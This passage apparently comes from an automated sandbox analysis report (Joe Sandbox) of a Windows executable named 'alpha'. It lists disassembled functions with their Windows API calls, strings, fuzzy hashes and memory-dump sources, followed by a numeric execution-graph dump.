                                                                                          • Instruction ID: 4704939fc40ae1e83674f7a1d186ebe4ce6bad30e8d4efd8d8cc159942be742e
                                                                                          • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                          • Instruction Fuzzy Hash: 9271D772D0A2439AEB60CF15A440779B6F4FB99799F604235CA4DD3BA0DF3CE445AB00
                                                                                          Function 00007FF6A0EA08EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmovewcsncmp
                                                                                          • String ID: 0123456789
                                                                                          • API String ID: 3879766669-2793719750
                                                                                          • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                          • Instruction ID: 7270d92c4387153d56009a2050050de24e909c692dc1978e14fc40dad23fb1d3
                                                                                          • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                          • Instruction Fuzzy Hash: 5241F732F1A78B99EA658F26D4002BA63A4FF88BC1F645131DE4E83785DF3CD5459380
                                                                                          Function 00007FF6A0E99784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E997D0
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D46E
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D485
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D4EE
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: iswspace.MSVCRT ref: 00007FF6A0E7D54D
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D569
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D58C
                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E998D7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                          • String ID: Software\Classes
                                                                                          • API String ID: 2714550308-1656466771
                                                                                          • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                          • Instruction ID: b5b8e85c48691b17884880af5c8ee277864f97eb2cfcdb4b31dc6f7fab3de6e1
                                                                                          • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                          • Instruction Fuzzy Hash: 3F41D232B0A753A2EA14DB1AD44503DA3A4FB89BD0F508135DE1E877E5EF39E856D340
                                                                                          Function 00007FF6A0E9A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9A0FC
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D46E
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D485
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D4EE
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: iswspace.MSVCRT ref: 00007FF6A0E7D54D
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D569
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D58C
                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9A1FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                          • String ID: Software\Classes
                                                                                          • API String ID: 2714550308-1656466771
                                                                                          • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                          • Instruction ID: 8438b568964bf4fd76bd529530a98aa6c4b94132cdd34988982ff580125096dd
                                                                                          • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                          • Instruction Fuzzy Hash: AC419E32A0BB53A1EA00DB16D444439A3B4FF88BD0F548131DE5E877E5EE39D866D380
                                                                                          Function 00007FF6A0E7CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleTitle
                                                                                          • String ID: -
                                                                                          • API String ID: 3358957663-3695764949
                                                                                          • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                          • Instruction ID: 28811b9cb8bb691c97f7fc7a87e4288b7e322d72598338b1fbe79dbe6950b655
                                                                                          • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                          • Instruction Fuzzy Hash: 2B31D432E0A743A1EA149B11A8401786AA4FF4AB90F144535DE0E97BD6DF3CE444E740
                                                                                          Function 00007FF6A0E87280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmpswscanf
                                                                                          • String ID: :EOF
                                                                                          • API String ID: 1534968528-551370653
                                                                                          • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                          • Instruction ID: 17f1966b5c18e5d04fc44fa5d2ba4d675b04a840e272d9c5ffe31aa9919f4911
                                                                                          • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                          • Instruction Fuzzy Hash: C531B371F0E643E6FB549B15E9802B872A0FF59B50F548031EA9D963A1DF3CE885E740
                                                                                          Function 00007FF6A0E73BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmp
                                                                                          • String ID: /-Y
                                                                                          • API String ID: 1886669725-4274875248
                                                                                          • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                          • Instruction ID: 9f4ea942a5a8c1522c88cdf46cdeb6bc50f290c48ce76316364e4210d7ed1744
                                                                                          • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                          • Instruction Fuzzy Hash: 16219076E0A75791EA659B229440278F6A0BB48FC0F549071DE89B7795DF3CE882F310
                                                                                          Function 00007FF6A0E7B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 3$3
                                                                                          • API String ID: 0-2538865259
                                                                                          • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                          • Instruction ID: db99402bb4abab997ffae0f2246b5a97a628e6cbb8c46947602a823d9dd37cdf
                                                                                          • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                          • Instruction Fuzzy Hash: 33016972D0F283FAF3558BA0A8843747660BF86311F548236C51ED17A3DF3C6485B641
                                                                                          Function 00007FF6A0E806C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806D6
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806F0
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E8074D
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E80762
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1617791916-0
                                                                                          • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                          • Instruction ID: d8d2adda21f75f8bc6f9cc9520600fd33c715cc8777fb8e35c9c6532c3a957d0
                                                                                          • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                          • Instruction Fuzzy Hash: DD418E72A0BB43A6EA989F50E44017AB7E0FF8AB80F588036DA4E83751DF3CE544D740

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:1398
                                                                                          Total number of Limit Nodes:31
                                                                                          execution_graph 16789 7ff6a0e95b30 16797 7ff6a0e95a6c 16789->16797 16792 7ff6a0e95b83 16793 7ff6a0e95b54 16793->16792 16803 7ff6a0e96224 16793->16803 16798 7ff6a0e95a9e 16797->16798 16799 7ff6a0e95aa3 16797->16799 16815 7ff6a0e95f10 GetCurrentThreadId 16798->16815 16802 7ff6a0e95ac9 GetCurrentThreadId 16799->16802 16817 7ff6a0e96124 16799->16817 16802->16792 16802->16793 16804 7ff6a0e95b73 16803->16804 16805 7ff6a0e96239 16803->16805 16804->16792 16809 7ff6a0e96f88 16804->16809 16821 7ff6a0e960c4 16805->16821 16810 7ff6a0e96fb9 16809->16810 16814 7ff6a0e96fcf 16809->16814 16811 7ff6a0e9707b 16810->16811 16813 7ff6a0e96874 3 API calls 16810->16813 16811->16792 16813->16814 16814->16811 17060 7ff6a0e96e34 16814->17060 16816 7ff6a0e95f50 16815->16816 16816->16799 16818 7ff6a0e96153 16817->16818 16819 7ff6a0e96205 16817->16819 16818->16819 16820 7ff6a0e961de memcpy_s 16818->16820 16819->16802 16820->16819 16822 7ff6a0e960ef 16821->16822 16823 7ff6a0e960dc 16821->16823 16822->16804 16825 7ff6a0e95f74 GetCurrentThreadId 16822->16825 16827 7ff6a0e954b0 GetCurrentProcessId 16823->16827 16826 7ff6a0e95faf 16825->16826 16826->16804 16856 7ff6a0e833f0 16827->16856 16832 7ff6a0e95551 16865 7ff6a0e95edc 16832->16865 16833 7ff6a0e9555d 16868 7ff6a0e97524 WaitForSingleObjectEx 16833->16868 16836 7ff6a0e95556 16910 7ff6a0e88f80 16836->16910 16841 7ff6a0e955a4 16844 7ff6a0e955cc 16841->16844 16845 7ff6a0e96d1c 14 API calls 16841->16845 16846 7ff6a0e955f8 16844->16846 16847 7ff6a0e955db 16844->16847 16845->16844 16855 7ff6a0e955f6 16846->16855 16918 7ff6a0e9670c 16846->16918 16848 7ff6a0e96d1c 14 API calls 16847->16848 16848->16855 16851 7ff6a0e9561f 16851->16836 16906 7ff6a0e95740 CloseHandle 16851->16906 16853 7ff6a0e96d1c 14 API calls 16853->16855 16855->16851 16902 7ff6a0e96a04 ReleaseMutex 16855->16902 16857 7ff6a0e83433 CreateMutexExW 16856->16857 16858 7ff6a0e83421 16856->16858 16860 7ff6a0e9758c 16857->16860 16936 7ff6a0e83684 _vsnwprintf 16858->16936 16861 7ff6a0e975ae GetLastError 16860->16861 16862 7ff6a0e95547 16860->16862 16863 7ff6a0e95740 16 API calls 16861->16863 16862->16832 16862->16833 16864 7ff6a0e975c4 SetLastError 16863->16864 16864->16862 16938 7ff6a0e95e68 GetLastError 16865->16938 16869 7ff6a0e97552 16868->16869 16870 7ff6a0e9556c 16868->16870 16869->16870 17000 7ff6a0e959f4 16869->17000 16872 7ff6a0e9711c 16870->16872 16873 7ff6a0e9716c 16872->16873 16874 7ff6a0e971ed OpenSemaphoreW 16873->16874 16875 7ff6a0e9723a 16874->16875 16876 7ff6a0e9720d GetLastError 16874->16876 17006 7ff6a0e9627c WaitForSingleObject 16875->17006 16877 7ff6a0e97222 16876->16877 16898 7ff6a0e97233 16876->16898 17003 7ff6a0e96cfc 16877->17003 16881 7ff6a0e97382 16883 7ff6a0e88f80 7 API calls 16881->16883 16882 7ff6a0e97257 16885 7ff6a0e96d1c 14 API calls 16882->16885 16886 7ff6a0e95585 16883->16886 16884 7ff6a0e95740 16 API calls 16884->16881 16885->16898 16886->16841 16899 7ff6a0e96d1c 16886->16899 16887 7ff6a0e97277 OpenSemaphoreW 16887->16877 16889 7ff6a0e9731e 16887->16889 16890 7ff6a0e9627c 23 API calls 16889->16890 16891 7ff6a0e9732b 16890->16891 16892 7ff6a0e97331 16891->16892 16893 7ff6a0e97356 16891->16893 16894 7ff6a0e96d1c 14 API calls 16892->16894 16895 7ff6a0e95740 16 API calls 16893->16895 16896 7ff6a0e9734c 16894->16896 16895->16898 16897 7ff6a0e95740 16 API calls 16896->16897 16897->16898 16898->16881 16898->16884 16900 7ff6a0e96c5c 14 API calls 16899->16900 16901 7ff6a0e96d45 16900->16901 16901->16841 16903 7ff6a0e96a27 16902->16903 16904 7ff6a0e96a18 16902->16904 16903->16851 17026 7ff6a0e97504 16904->17026 16907 7ff6a0e95754 16906->16907 16909 7ff6a0e95763 16906->16909 16908 7ff6a0e97504 15 API calls 16907->16908 16908->16909 16909->16836 16911 7ff6a0e88f89 16910->16911 16912 7ff6a0e88f94 16911->16912 16913 7ff6a0e88fe0 RtlCaptureContext RtlLookupFunctionEntry 16911->16913 16912->16822 16914 7ff6a0e89025 RtlVirtualUnwind 16913->16914 16915 7ff6a0e89067 16913->16915 16914->16915 17034 7ff6a0e88fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16915->17034 17035 7ff6a0e96874 GetProcessHeap HeapAlloc 16918->17035 16921 7ff6a0e9676e 17038 7ff6a0e95770 16921->17038 16922 7ff6a0e9674b 16923 7ff6a0e96d1c 14 API calls 16922->16923 16925 7ff6a0e95667 16923->16925 16925->16853 16925->16855 16927 7ff6a0e967c1 memset memset 16930 7ff6a0e967b5 16927->16930 16928 7ff6a0e9679c 16929 7ff6a0e96d1c 14 API calls 16928->16929 16929->16930 16931 7ff6a0e95740 16 API calls 16930->16931 16932 7ff6a0e96836 16930->16932 16931->16932 16933 7ff6a0e95740 16 API calls 16932->16933 16934 7ff6a0e96843 16932->16934 16933->16934 16934->16925 17059 7ff6a0e95a38 GetProcessHeap RtlFreeHeap 16934->17059 16937 7ff6a0e836b7 16936->16937 16937->16857 16939 7ff6a0e95e8f 16938->16939 16940 7ff6a0e95ebf 16938->16940 16942 7ff6a0e96c5c 16939->16942 16940->16836 16945 7ff6a0e96a34 16942->16945 16946 7ff6a0e96a41 16945->16946 16953 7ff6a0e963fc 16946->16953 16949 7ff6a0e96b1d 16950 7ff6a0e88f80 7 API calls 16949->16950 16952 7ff6a0e96b2e 16950->16952 16952->16940 16954 7ff6a0e96455 16953->16954 16955 7ff6a0e96461 16953->16955 16954->16955 16956 7ff6a0e96c5c 11 API calls 16954->16956 16957 7ff6a0e964f9 GetCurrentThreadId 16955->16957 16956->16955 16958 7ff6a0e96561 16957->16958 16959 7ff6a0e965ea 16958->16959 16960 7ff6a0e965f5 IsDebuggerPresent 16958->16960 16961 7ff6a0e9666c OutputDebugStringW 16959->16961 16963 7ff6a0e9660b 16959->16963 16968 7ff6a0e95bf4 16959->16968 16960->16959 16961->16963 16963->16949 16964 7ff6a0e9742c 16963->16964 16965 7ff6a0e97444 16964->16965 16966 7ff6a0e9744a memset 16964->16966 16965->16966 16967 7ff6a0e97489 16966->16967 16972 7ff6a0e95c2e 16968->16972 16996 7ff6a0e95e13 16968->16996 16969 7ff6a0e88f80 7 API calls 16970 7ff6a0e95e49 16969->16970 16970->16961 16971 7ff6a0e95ca7 FormatMessageW 16973 7ff6a0e95d1f 16971->16973 16974 7ff6a0e95cfc 16971->16974 16972->16971 16972->16996 16976 7ff6a0e966bc _vsnwprintf 16973->16976 16997 7ff6a0e966bc 16974->16997 16977 7ff6a0e95d1d 16976->16977 16978 7ff6a0e95d54 GetCurrentThreadId 16977->16978 16980 7ff6a0e966bc _vsnwprintf 16977->16980 16979 7ff6a0e966bc _vsnwprintf 16978->16979 16981 7ff6a0e95d91 16979->16981 16982 7ff6a0e95d51 16980->16982 16983 7ff6a0e966bc _vsnwprintf 16981->16983 16981->16996 16982->16978 16984 7ff6a0e95db9 16983->16984 16985 7ff6a0e95dd4 16984->16985 16986 7ff6a0e966bc _vsnwprintf 16984->16986 16987 7ff6a0e95def 16985->16987 16988 7ff6a0e966bc _vsnwprintf 16985->16988 16986->16985 16989 7ff6a0e95dff 16987->16989 16990 7ff6a0e95e15 16987->16990 16988->16987 16993 7ff6a0e966bc _vsnwprintf 16989->16993 16991 7ff6a0e95e2b 16990->16991 16992 7ff6a0e95e1d 16990->16992 16995 7ff6a0e966bc _vsnwprintf 16991->16995 16994 7ff6a0e966bc _vsnwprintf 16992->16994 16993->16996 16994->16996 16995->16996 16996->16969 16998 7ff6a0e8363c _vsnwprintf 16997->16998 16999 7ff6a0e966e2 16998->16999 16999->16977 16999->16999 17001 7ff6a0e96c5c 14 API calls 17000->17001 17002 7ff6a0e95a2c 17001->17002 17002->16870 17021 7ff6a0e96bd0 17003->17021 17007 7ff6a0e9629f 17006->17007 17008 7ff6a0e962b3 17006->17008 17009 7ff6a0e96cfc 15 API calls 17007->17009 17010 7ff6a0e96334 ReleaseSemaphore 17008->17010 17011 7ff6a0e962d9 ReleaseSemaphore 17008->17011 17020 7ff6a0e962be 17008->17020 17013 7ff6a0e962ae 17009->17013 17010->17007 17012 7ff6a0e96358 17010->17012 17011->17007 17014 7ff6a0e962f5 ReleaseSemaphore 17011->17014 17015 7ff6a0e96366 ReleaseSemaphore 17012->17015 17012->17020 17013->16882 17013->16887 17017 7ff6a0e96313 GetLastError 17014->17017 17014->17020 17018 7ff6a0e96380 GetLastError 17015->17018 17015->17020 17016 7ff6a0e96d1c 14 API calls 17016->17013 17017->17013 17017->17020 17019 7ff6a0e96393 WaitForSingleObject 17018->17019 17018->17020 17019->17020 17020->17013 17020->17016 17022 7ff6a0e95e68 15 API calls 17021->17022 17023 7ff6a0e96c01 17022->17023 17024 7ff6a0e96a34 14 API calls 17023->17024 17025 7ff6a0e96c3b 17024->17025 17025->16898 17029 7ff6a0e96b40 17026->17029 17030 7ff6a0e95e68 15 API calls 17029->17030 17031 7ff6a0e96b71 17030->17031 17032 7ff6a0e96a34 14 API calls 17031->17032 17033 7ff6a0e96baf 17032->17033 17033->16903 17036 7ff6a0e9673e 17035->17036 17037 7ff6a0e968b0 GetProcessHeap 17035->17037 17036->16921 17036->16922 17037->17036 17039 7ff6a0e957aa 17038->17039 17040 7ff6a0e9584a CreateSemaphoreExW 17039->17040 17041 7ff6a0e95895 17040->17041 17042 7ff6a0e95885 17040->17042 17044 7ff6a0e95edc 15 API calls 17041->17044 17043 7ff6a0e9758c 18 API calls 17042->17043 17045 7ff6a0e95890 17043->17045 17044->17045 17046 7ff6a0e958a0 17045->17046 17054 7ff6a0e958c3 CreateSemaphoreExW 17045->17054 17047 7ff6a0e96d1c 14 API calls 17046->17047 17048 7ff6a0e958bc 17047->17048 17049 7ff6a0e88f80 7 API calls 17048->17049 17050 7ff6a0e959bd 17049->17050 17050->16927 17050->16928 17052 7ff6a0e9596f 17055 7ff6a0e9758c 18 API calls 17052->17055 17053 7ff6a0e95980 17056 7ff6a0e95edc 15 API calls 17053->17056 17054->17052 17054->17053 17057 7ff6a0e9597b 17055->17057 17056->17057 17057->17048 17058 7ff6a0e96d1c 14 API calls 17057->17058 17058->17048 17061 7ff6a0e96ea6 17060->17061 17062 7ff6a0e96f0c 17061->17062 17063 7ff6a0e96874 3 API calls 17061->17063 17065 7ff6a0e96f5f 17062->17065 17073 7ff6a0e952f0 17062->17073 17064 7ff6a0e96edb 17063->17064 17064->17062 17066 7ff6a0e96ee3 GetProcessHeap RtlFreeHeap 17064->17066 17065->16811 17066->17062 17069 7ff6a0e952f0 memcpy_s 17070 7ff6a0e96f3d 17069->17070 17077 7ff6a0e9536c 17070->17077 17074 7ff6a0e9530a 17073->17074 17076 7ff6a0e9533f 17073->17076 17075 7ff6a0e95328 memcpy_s 17074->17075 17074->17076 17075->17076 17076->17069 17078 7ff6a0e95390 17077->17078 17079 7ff6a0e953c8 memset 17077->17079 17078->17079 17080 7ff6a0e953ae memcpy_s 17078->17080 17079->17065 17080->17079 17083 7ff6a0e9be30 17097 